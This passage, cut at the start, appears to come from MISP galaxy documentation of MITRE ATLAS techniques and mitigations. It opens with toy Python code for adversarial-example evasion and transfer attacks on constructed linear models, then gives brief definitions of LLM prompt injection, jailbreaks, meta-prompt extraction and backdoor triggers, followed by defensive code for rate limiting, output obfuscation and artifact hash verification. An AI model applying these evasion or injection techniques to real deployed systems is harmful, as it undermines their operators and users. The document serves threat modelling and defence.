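    return fgsm(model, x, eps), eps


def transfer_attack(proxy, api, x, slack=1.2):
    """Black-box transfer: optimise on the proxy, then spend exactly one API
    query to verify. Returns (x_adv, eps, verified)."""
    eps = slack * minimal_eps(proxy, x)
    x_adv = fgsm(proxy, x, eps)
    assert label(proxy, x_adv) == 0, "must evade the proxy by construction"
    verified = api(x_adv) == 0
    return x_adv, eps, verified


if __name__ == "__main__":
    x = [0.5, -0.2, 0.4]  # constructed clean input, class 1 on the victim
    x_wb, eps_wb = white_box_attack(VICTIM, x)
    print(f"white-box: eps={eps_wb:.3f} victim label={label(VICTIM, x_wb)}")
    for name, proxy in (("good proxy", GOOD_PROXY), ("poor proxy", POOR_PROXY)):
        _, eps, ok = transfer_attack(proxy, victim_inference_api, x)
        print(f"transfer via {name}: eps={eps:.3f} verified={ok}")
    print(f"victim saw {len(QUERY_LOG)} queries in total")
```

The poor proxy disagrees with the victim on one weight sign, so part of its perturbation budget is spent in the wrong direction and the example that evades the proxy does not evade the victim; the single verification query is what tells the adversary. That query is also the whole of the victim's view of the attack, which is why the Verify Attack entry notes that verification is hard to detect.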

Manual Modification

Adversaries may manually modify the input data to craft adversarial data. They may use their knowledge of the target model to modify parts of the data they suspect helps the model in performing its task. The adversary may use trial and error until they are able to verify they have a working adversarial input.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Manual Modification"

Table 5277. Table References

Links

https://atlas.mitre.org/techniques/AML.T0043.003

Insert Backdoor Trigger

The adversary may add a perceptual trigger into inference data. The trigger may be imperceptible or non-obvious to humans. This technique is used in conjunction with [Poison ML Model](https://atlas.mitre.org/techniques/AML.T0018.000) and allows the adversary to produce their desired effect in the target model.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Insert Backdoor Trigger"

Table 5278. Table References

Links

https://atlas.mitre.org/techniques/AML.T0043.004

Full ML Model Access

Adversaries may gain full "white-box" access to a machine learning model. This means the adversary has complete knowledge of the model architecture, its parameters, and class ontology. They may exfiltrate the model to [Craft Adversarial Data](https://atlas.mitre.org/techniques/AML.T0043) and [Verify Attack](https://atlas.mitre.org/techniques/AML.T0042) in an offline setting where it is hard to detect their behavior.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Full ML Model Access"

Table 5279. Table References

Links

https://atlas.mitre.org/techniques/AML.T0044

Spamming ML System with Chaff Data

Adversaries may spam the machine learning system with chaff data that causes an increase in the number of detections. This can cause analysts at the victim organization to waste time reviewing and correcting incorrect inferences.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Spamming ML System with Chaff Data"

Table 5280. Table References

Links

https://atlas.mitre.org/techniques/AML.T0046

ML-Enabled Product or Service

Adversaries may use a product or service that uses machine learning under the hood to gain access to the underlying machine learning model. This type of indirect model access may reveal details of the ML model or its inferences in logs or metadata.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="ML-Enabled Product or Service"

Table 5281. Table References

Links

https://atlas.mitre.org/techniques/AML.T0047

External Harms

Adversaries may abuse their access to a victim system and use its resources or capabilities to further their goals by causing harms external to that system. These harms could affect the organization (e.g. Financial Harm, Reputational Harm), its users (e.g. User Harm), or the general public (e.g. Societal Harm).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="External Harms"

Table 5282. Table References

Links

https://atlas.mitre.org/techniques/AML.T0048

Financial Harm

Financial harm involves the loss of wealth, property, or other monetary assets due to theft, fraud or forgery, or pressure to provide financial resources to the adversary.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Financial Harm"

Table 5283. Table References

Links

https://atlas.mitre.org/techniques/AML.T0048.000

Reputational Harm

Reputational harm involves a degradation of public perception and trust in organizations. Examples of reputation-harming incidents include scandals or false impersonations.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Reputational Harm"

Table 5284. Table References

Links

https://atlas.mitre.org/techniques/AML.T0048.001

Societal Harm

Societal harms are harmful outcomes that reach either the general public or specific vulnerable groups, such as the exposure of children to vulgar content.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Societal Harm"

Table 5285. Table References

Links

https://atlas.mitre.org/techniques/AML.T0048.002

User Harm

User harms may encompass a variety of harm types, including financial and reputational, that are directed at or felt by individual victims of the attack rather than at the organization level.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="User Harm"

Table 5286. Table References

Links

https://atlas.mitre.org/techniques/AML.T0048.003

ML Intellectual Property Theft

Adversaries may exfiltrate ML artifacts to steal intellectual property and cause economic harm to the victim organization.

Proprietary training data is costly to collect and annotate and may be a target for [Exfiltration](https://atlas.mitre.org/tactics/AML.TA0010) and theft.

MLaaS providers charge for use of their API. An adversary who has stolen a model via [Exfiltration](https://atlas.mitre.org/tactics/AML.TA0010) or via [Extract ML Model](https://atlas.mitre.org/techniques/AML.T0024.002) now has unlimited use of that service without paying the owner of the intellectual property.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="ML Intellectual Property Theft"

Table 5287. Table References

Links

https://atlas.mitre.org/techniques/AML.T0048.004

Exploit Public-Facing Application

Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Exploit Public-Facing Application"

Table 5288. Table References

Links

https://atlas.mitre.org/techniques/AML.T0049

Command and Scripting Interpreter

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.

There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic.

Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Command and Scripting Interpreter"

Table 5289. Table References

Links

https://atlas.mitre.org/techniques/AML.T0050

LLM Prompt Injection

An adversary may craft malicious prompts as inputs to an LLM that cause the LLM to act in unintended ways. These "prompt injections" are often designed to cause the model to ignore aspects of its original instructions and follow the adversary’s instructions instead.

Prompt Injections can be an initial access vector to the LLM that provides the adversary with a foothold to carry out other steps in their operation. They may be designed to bypass defenses in the LLM, or allow the adversary to issue privileged commands. The effects of a prompt injection can persist throughout an interactive session with an LLM.

Malicious prompts may be injected directly by the adversary ([Direct](https://atlas.mitre.org/techniques/AML.T0051.000)), either to leverage the LLM to generate harmful content or to gain a foothold on the system and lead to further effects. Prompts may also be injected indirectly, when the LLM ingests the malicious prompt from another data source as part of its normal operation ([Indirect](https://atlas.mitre.org/techniques/AML.T0051.001)). This type of injection can be used by the adversary to gain a foothold on the system or to target the user of the LLM.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="LLM Prompt Injection"

Table 5290. Table References

Links

https://atlas.mitre.org/techniques/AML.T0051

Direct

An adversary may inject prompts directly as a user of the LLM. This type of injection may be used by the adversary to gain a foothold in the system or to misuse the LLM itself, as for example to generate harmful content.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Direct"

Table 5291. Table References

Links

https://atlas.mitre.org/techniques/AML.T0051.000

Indirect

An adversary may inject prompts indirectly via a separate data channel ingested by the LLM, such as text or multimedia pulled from databases or websites. These malicious prompts may be hidden or obfuscated from the user. This type of injection may be used by the adversary to gain a foothold in the system or to target an unwitting user of the system.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Indirect"

Table 5292. Table References

Links

https://atlas.mitre.org/techniques/AML.T0051.001

Phishing

Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.

Generative AI, including LLMs that generate synthetic text, visual deepfakes of faces, and audio deepfakes of speech, is enabling adversaries to scale targeted phishing campaigns. LLMs can interact with users via text conversations and can be programmed with a meta prompt to phish for sensitive information. Deepfakes can be used in impersonation as an aid to phishing.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Phishing"

Table 5293. Table References

Links

https://atlas.mitre.org/techniques/AML.T0052

Spearphishing via Social Engineering LLM

Adversaries may turn LLMs into targeted social engineers. LLMs are capable of interacting with users via text conversations. They can be instructed by an adversary to seek sensitive information from a user and act as effective social engineers. They can be targeted towards particular personas defined by the adversary. This allows adversaries to scale spearphishing efforts and target individuals to reveal private information such as credentials to privileged systems.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Spearphishing via Social Engineering LLM"

Table 5294. Table References

Links

https://atlas.mitre.org/techniques/AML.T0052.000

LLM Plugin Compromise

Adversaries may use their access to an LLM that is part of a larger system to compromise connected plugins. LLMs are often connected to other services or resources via plugins to increase their capabilities. Plugins may include integrations with other applications, access to public or private data sources, and the ability to execute code.

This may allow adversaries to execute API calls to integrated applications or plugins, providing the adversary with increased privileges on the system. Adversaries may take advantage of connected data sources to retrieve sensitive information. They may also use an LLM integrated with a command or script interpreter to execute arbitrary instructions.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="LLM Plugin Compromise"

Table 5295. Table References

Links

https://atlas.mitre.org/techniques/AML.T0053

LLM Jailbreak

An adversary may use a carefully crafted [LLM Prompt Injection](https://atlas.mitre.org/techniques/AML.T0051) designed to place the LLM in a state in which it will freely respond to any user input, bypassing any controls, restrictions, or guardrails placed on the LLM. Once successfully jailbroken, the LLM can be used in unintended ways by the adversary.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="LLM Jailbreak"

Table 5296. Table References

Links

https://atlas.mitre.org/techniques/AML.T0054

Unsecured Credentials

Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. bash history), environment variables, operating system or application-specific repositories (e.g. Credentials in Registry), or other specialized files/artifacts (e.g. private keys).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Unsecured Credentials"

Table 5297. Table References

Links

https://atlas.mitre.org/techniques/AML.T0055

LLM Meta Prompt Extraction

An adversary may induce an LLM to reveal its initial instructions, or "meta prompt." Discovering the meta prompt can inform the adversary about the internal workings of the system. Prompt engineering is an emerging field that requires expertise, and exfiltrating the meta prompt can be a way to steal valuable intellectual property.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="LLM Meta Prompt Extraction"

Table 5298. Table References

Links

https://atlas.mitre.org/techniques/AML.T0056

LLM Data Leakage

Adversaries may craft prompts that induce the LLM to leak sensitive information. This can include private user data or proprietary information. The leaked information may come from proprietary training data, data sources the LLM is connected to, or information from other users of the LLM.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="LLM Data Leakage"

Table 5299. Table References

Links

https://atlas.mitre.org/techniques/AML.T0057

MITRE ATLAS Course of Action

MITRE ATLAS Mitigation - Adversarial Threat Landscape for Artificial-Intelligence Systems.

MITRE ATLAS Course of Action is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Limit Release of Public Information

Limit the public release of technical information about the machine learning stack used in an organization’s products or services. Technical knowledge of how machine learning is used can be leveraged by adversaries to perform targeting and tailor attacks to the target system. Additionally, consider limiting the release of organizational information - including physical locations, researcher names, and department structures - from which technical details such as machine learning techniques, model architectures, or datasets may be inferred.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Limit Release of Public Information"

Limit Release of Public Information has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Search for Victim’s Publicly Available Research Materials" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Search Victim-Owned Websites" with estimative-language:likelihood-probability="almost-certain"

Table 5300. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0000

Limit Model Artifact Release

Limit public release of technical project details including data, algorithms, model architectures, and model checkpoints that are used in production, or that are representative of those used in production.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Limit Model Artifact Release"

Limit Model Artifact Release has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Models" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Poison Training Data" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Datasets" with estimative-language:likelihood-probability="almost-certain"

Table 5301. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0001

Passive ML Output Obfuscation

Decreasing the fidelity of model outputs provided to the end user can reduce an adversary's ability to extract information about the model and optimize attacks for the model.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Passive ML Output Obfuscation"

Passive ML Output Obfuscation has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Invert ML Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Model Ontology" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Black-Box Optimization" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Infer Training Data Membership" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Model Family" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Extract ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5302. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0002

Model Hardening

Use techniques to make machine learning models robust to adversarial inputs such as adversarial training or network distillation.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Model Hardening"

Model Hardening has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Erode ML Model Integrity" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Evade ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5303. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0003

Restrict Number of ML Model Queries

Limit the total number and rate of queries a user can perform.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Restrict Number of ML Model Queries"

Restrict Number of ML Model Queries has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Denial of ML Service" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Spamming ML System with Chaff Data" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Exfiltration via ML Inference API" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Invert ML Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Model Ontology" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Black-Box Optimization" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Infer Training Data Membership" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Model Family" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Extract ML Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Cost Harvesting" with estimative-language:likelihood-probability="almost-certain"

Table 5304. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0004
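As an added example serving both Passive ML Output Obfuscation (AML.M0002) and Restrict Number of ML Model Queries (AML.M0004), the following Python is a small inference gateway; it is not code from ATLAS, MISP or any vendor. Each user gets a token bucket (sustained rate plus burst) and a lifetime quota, and whatever the model returns is cut down to the top-k labels with rounded confidences before it leaves the service. `toy_model`, `LABELS`, the probability vector it returns and `FakeClock` are constructed for the example; a deployment would pass the real model and leave the default `time.monotonic` clock.

```python
import time
from dataclasses import dataclass

LABELS = ["cat", "dog", "fox"]   # class ontology of the hypothetical model


def toy_model(features):
    """Stand-in for the real classifier: a full probability vector over LABELS.
    Constructed output; a real model would compute it from `features`."""
    return [0.6123, 0.3021, 0.0856]


@dataclass
class _Bucket:
    tokens: float   # burst capacity currently available
    last: float     # timestamp of the last refill
    used: int = 0   # lifetime queries counted against the quota


class InferenceGateway:
    """Front door to a model: per-user token bucket plus lifetime quota
    (AML.M0004) and reduced-fidelity outputs (AML.M0002)."""

    def __init__(self, model, labels, rate_per_sec=1.0, burst=5, quota=1000,
                 top_k=1, decimals=1, clock=time.monotonic):
        self.model, self.labels = model, labels
        self.rate, self.burst, self.quota = rate_per_sec, burst, quota
        self.top_k, self.decimals, self.clock = top_k, decimals, clock
        self._buckets = {}

    def _admit(self, user):
        now = self.clock()
        bucket = self._buckets.get(user)
        if bucket is None:
            bucket = self._buckets[user] = _Bucket(tokens=float(self.burst), last=now)
        # Refill proportionally to elapsed time, never above the burst size.
        bucket.tokens = min(self.burst, bucket.tokens + (now - bucket.last) * self.rate)
        bucket.last = now
        if bucket.used >= self.quota:
            return "quota_exceeded"
        if bucket.tokens < 1.0:
            return "rate_limited"
        bucket.tokens -= 1.0
        bucket.used += 1
        return "ok"

    def obfuscate(self, probs):
        """Keep only the top-k classes and round their scores: the caller learns
        the decision, not the full output surface the model computed."""
        ranked = sorted(zip(self.labels, probs), key=lambda lp: lp[1], reverse=True)
        return [(label, round(p, self.decimals)) for label, p in ranked[: self.top_k]]

    def predict(self, user, features):
        status = self._admit(user)
        if status != "ok":
            return {"status": status}           # the model is never invoked
        return {"status": "ok", "prediction": self.obfuscate(self.model(features))}


class FakeClock:
    """Deterministic clock for the demonstration; production uses time.monotonic."""

    def __init__(self):
        self.now = 0.0

    def advance(self, seconds):
        self.now += seconds

    def __call__(self):
        return self.now


if __name__ == "__main__":
    clock = FakeClock()
    gateway = InferenceGateway(toy_model, LABELS, rate_per_sec=1.0, burst=3, quota=5, clock=clock)
    for _ in range(4):
        print(gateway.predict("alice", [0.1, 0.2]))   # three "ok", then "rate_limited"
```

Denied requests never reach the model, so the limiter also caps the cost an adversary can impose. Rounding is a tradeoff rather than a cure: coarser outputs slow model extraction and membership inference but also remove calibration information that legitimate clients may rely on, so the `top_k` and `decimals` settings should be decided per consumer.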

Control Access to ML Models and Data at Rest

Establish access controls on internal model registries and limit internal access to production models. Limit access to training data only to approved users.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Control Access to ML Models and Data at Rest"

Control Access to ML Models and Data at Rest has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="ML Intellectual Property Theft" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Exfiltration via Cyber Means" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Data" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Inject Payload" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Poison Training Data" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Poison ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5305. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0005

Use Ensemble Methods

Use an ensemble of models for inference to increase robustness to adversarial inputs. Some attacks may effectively evade one model or model family but be ineffective against others.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Use Ensemble Methods"

Use Ensemble Methods has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="ML Software" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Model Family" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Erode ML Model Integrity" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Evade ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5306. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0006

Sanitize Training Data

Detect and remove or remediate poisoned training data. Training data should be sanitized prior to model training and recurrently for an active learning model.

Implement a filter to limit ingested training data. Establish a content policy that would remove unwanted content such as certain explicit or offensive language from being used.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Sanitize Training Data"

Sanitize Training Data has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Data" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Poison Training Data" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Poison ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5307. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0007

Validate ML Model

Validate that machine learning models perform as intended by testing for backdoor triggers or adversarial bias.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Validate ML Model"

Validate ML Model has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Inject Payload" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Poison ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5308. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0008

Use Multi-Modal Sensors

Incorporate multiple sensors to integrate varying perspectives and modalities to avoid a single point of failure susceptible to physical attacks.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Use Multi-Modal Sensors"

Use Multi-Modal Sensors has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Evade ML Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Physical Environment Access" with estimative-language:likelihood-probability="almost-certain"

Table 5309. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0009

Input Restoration

Preprocess all inference data to nullify or reverse potential adversarial perturbations.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Input Restoration"

Input Restoration has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Black-Box Optimization" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Erode ML Model Integrity" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Evade ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5310. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0010

Restrict Library Loading

Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potentially vulnerable software.

File formats such as pickle files that are commonly used to store machine learning models can contain exploits that allow for loading of malicious libraries.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Restrict Library Loading"

Restrict Library Loading has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Unsafe ML Artifacts" with estimative-language:likelihood-probability="almost-certain"

Table 5311. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0011

Encrypt Sensitive Information

Encrypt sensitive data such as ML models to protect against adversaries attempting to access sensitive data.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Encrypt Sensitive Information"

Encrypt Sensitive Information has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="ML Intellectual Property Theft" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Artifacts" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="ML Artifact Collection" with estimative-language:likelihood-probability="almost-certain"

Table 5312. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0012

Code Signing

Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing. Adversaries can embed malicious code in ML software or models. Enforcement of code signing can prevent the compromise of the machine learning supply chain and prevent execution of malicious code.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Code Signing"

Code Signing has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="ML Software" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Unsafe ML Artifacts" with estimative-language:likelihood-probability="almost-certain"

Table 5313. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0013

Verify ML Artifacts

Verify the cryptographic checksum of all machine learning artifacts to confirm that the file was not modified by an attacker.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Verify ML Artifacts"

Verify ML Artifacts has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Publish Poisoned Datasets" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="ML Supply Chain Compromise" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Unsafe ML Artifacts" with estimative-language:likelihood-probability="almost-certain"

Table 5314. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0014
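As an added example for Verify ML Artifacts (AML.M0014), and for the integrity half of Code Signing (AML.M0013), the following Python builds a SHA-256 manifest for a directory of artifacts and later checks the directory against it; it is not code from ATLAS or MISP. The manifest itself must come from somewhere the attacker cannot write, such as a signed release or a copy pinned in the deployment repository; producing that signature is outside this example. The file names and contents in `demo_verification` are constructed.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path

CHUNK = 1 << 20   # hash in 1 MiB pieces so multi-gigabyte checkpoints do not load into memory


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map of relative path -> sha256 for every regular file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify_manifest(manifest, root):
    """Per-file verdict: ok / mismatch / missing, plus 'unlisted' for files on
    disk that the manifest does not cover (an unlisted .pkl is a finding too)."""
    root = Path(root)
    report = {}
    for rel, expected in manifest.items():
        path = root / rel
        if not path.is_file():
            report[rel] = "missing"
            continue
        # compare_digest keeps the comparison time independent of where digests differ
        report[rel] = "ok" if hmac.compare_digest(sha256_file(path), expected) else "mismatch"
    for p in root.rglob("*"):
        rel = p.relative_to(root).as_posix()
        if p.is_file() and rel not in manifest:
            report[rel] = "unlisted"
    return report


def demo_verification():
    """Constructed scenario: a clean check, then a tampered, deleted and added file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "model.bin").write_bytes(b"\x00weights...")            # constructed sample
        (root / "tokenizer.json").write_text('{"vocab": 3}')
        manifest = build_manifest(root)
        clean = verify_manifest(manifest, root)
        (root / "model.bin").write_bytes(b"\x00weights...+backdoor")   # modified in place
        (root / "tokenizer.json").unlink()                             # removed
        (root / "extra.pkl").write_bytes(b"not in the manifest")       # dropped in
        tampered = verify_manifest(manifest, root)
    return clean, tampered


if __name__ == "__main__":
    before, after = demo_verification()
    print("clean:   ", before)
    print("tampered:", after)
```

Run the verification at load time, not only at download time: an artifact that was correct when fetched can still be replaced on shared storage before the serving process opens it.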

Adversarial Input Detection

Detect and block adversarial inputs or atypical queries that deviate from known benign behavior, exhibit behavior patterns observed in previous attacks or that come from potentially malicious IPs. Incorporate adversarial detection algorithms into the ML system prior to the ML model.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Adversarial Input Detection"

Adversarial Input Detection has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Denial of ML Service" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Black-Box Optimization" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Erode ML Model Integrity" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Evade ML Model" with estimative-language:likelihood-probability="almost-certain"

Table 5315. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0015

Vulnerability Scanning

Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.

File formats such as pickle files that are commonly used to store machine learning models can contain exploits that allow for arbitrary code execution.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Vulnerability Scanning"

Vulnerability Scanning has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Unsafe ML Artifacts" with estimative-language:likelihood-probability="almost-certain"

Table 5316. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0016
